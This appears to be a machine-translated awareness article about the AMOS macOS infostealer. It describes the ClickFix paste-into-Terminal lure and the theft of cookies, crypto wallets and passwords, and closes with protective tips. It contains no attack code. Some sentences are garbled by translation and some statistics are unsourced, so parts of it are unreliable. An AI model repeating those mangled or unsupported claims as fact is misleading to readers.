For years we've lived with the idea that owning an Apple device was like living in a gated community with 24-hour security; a place where viruses never crossed the threshold. However, the landscape has changed dramatically with the expansion of AMOS, a malicious code specifically designed to steal macOS systems. This malware, which experts technically know as Atomic macOS Stealer, has shown that it doesn't need to find a crack in the operating system's walls; it's enough for us to open the door to it with complete trust.
The situation in Europe, and especially in Spain, is raising alarm bells among leading cybersecurity firms, as attackers have begun to refine their social engineering tactics to trick us into falling into their traps without the slightest suspicion. We're no longer dealing with the typical poorly written email that reeks of a scam from a mile away, but with... highly sophisticated campaigns that impersonate tools productivity or artificial intelligence services. The problem has grown so much that, according to telemetry reports from 2026, almost half of the data breaches in Apple environments bear the mark of this infamous software, making it clear that the story of Mac immunity is no longer believed by anyone working in cybersecurity.
How they pull the wool over our eyes: the anatomy of the AMOS attack
The way this infostealer works is as simple as it is effective, which is precisely what makes it so dangerous for the average user. Instead of battling the complex cores of Apple's system, AMOS looks for the direct access through the Terminal of the team. Using a technique known as ClickFix, cybercriminals trick fraudulent websites into displaying fake error messages that supposedly can be fixed by pasting a line of code into the Mac's console. By doing so, the user unknowingly disables the defenses and grants full permissions for the malware to begin rummaging through their most private files.
Once it has gained access to the system, the malware wastes no time and activates automatic subroutines to scan popular browsers like Safari, Chrome, and Firefox. The main objective is obtain active session cookies And autofill history allows them to access our social media accounts or emails without the system asking for our password again. It's a real problem, because with this, attackers can hijack entire digital identities in a matter of seconds without us even realizing anything strange is happening on our desktop until it's too late.
Their preferred loot: cryptocurrencies and financial data
If there's one thing AMOS loves above all else, it's cryptocurrencies, and this is where the economic impact can be truly devastating for those affected. The script is programmed to locate digital wallets and seed phrases stored on the hard drive or in browser extensions. To complete the process, the malware displays pop-up windows that perfectly mimic the macOS aesthetic, requesting the administrator password. If we make the mistake of entering it, we are handing it the keys to the kingdom, allowing it to validate the password locally and proceed with the mass exfiltration of all our information to its external servers.
The most modern variants, such as SHAMOS, have been detected in hundreds of European corporate environments in recent months, indicating that the target is no longer just the home user, but also the theft of trade secrets. Operating under a "malware-as-a-service" model, any criminal with a small budget can rent these tools to launch their own attacks. Therefore, it is vital be wary of any unexpected message that asks us to perform manual technical actions, no matter how official the website may seem or how much it promises free access to paid services that normally cost an arm and a leg.
Tips to avoid ending up with an infected Mac
The best defense remains common sense, even though it sometimes catches us off guard after a long day at work. It's crucial to never download installers from sources other than the official ones or the App Store, and even less so if they are "cracked" versions that promise free premium features. Furthermore, it's important to understand that No legitimate website will ever ask you for this. that you open Terminal to troubleshoot a browser compatibility issue. If you see something like that, close the tab and get out of there fast, because it's a clear sign they're trying to pull a fast one on you.
It's also a good idea to occasionally review the browser extensions you have installed and remove any you don't use or don't remember installing yourself. Keeping your system updated helps, but since AMOS exploits trust and not a code vulnerability, the responsibility always lies with you. Using a good password manager and enabling two-factor authentication on all possible accounts is essential. the best barrier to avoid unpleasantness major issues if we accidentally run a suspicious file.
At the end of the day, the security of our Apple devices is no longer something we can take for granted simply because of the logo on the lid. Current realities force us to change our mindset and understand that the bitten apple isn't a magic shield against the most insidious digital fraud. Staying vigilant, verifying every download, and above all, not trusting miracle solutions that require us to tinker with the system's inner workings through the Terminal are essential. Right now, so that our savings and our privacy remain only ours, without any stranger coming to get their hands on our virtual wallet because of a lapse in attention.